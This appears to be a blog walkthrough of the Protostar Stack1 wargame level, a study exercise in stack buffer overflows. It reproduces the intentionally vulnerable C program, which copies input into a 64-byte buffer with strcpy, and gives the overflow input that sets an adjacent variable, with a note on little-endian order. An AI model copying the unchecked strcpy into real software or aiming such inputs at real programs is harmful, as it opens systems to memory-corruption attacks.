Protostar Stack1

Here are the instructions for the challenge

About
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

Hints

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}


I won’t go into quite as much detail on this challenge. The C source code just sets up a local variable called ‘modified’, sets up a character array called ‘buffer’ that is 64 characters long, then checks to make sure that the program was called with one argument. Next it uses strpy to read the argument into the character. Finally it checks if the value of modified has been changed.

This is very similar to the last challenge. The only difference is that modified needs to be set to an exact value to win. Line 18 says modified needs to be 0x61626364. Using an ascii table I can see that hex 61 is lowercase a, 62 is lowercase b, 63 is lowercase c and 64 is lowercase d.

I assume that I can overrun the 64 byte buffer just like I did last time. Then I place my abcd after the 64 characters.

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAabcd
Try again, you got 0x64636261

But why is my string backwards? It’s because the memory is stored using little endian.
I just switch my abcd around to dcba and try again.

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
you have correctly got the variable to the right value

Perfect!

Leave a Reply

Your email address will not be published. Required fields are marked *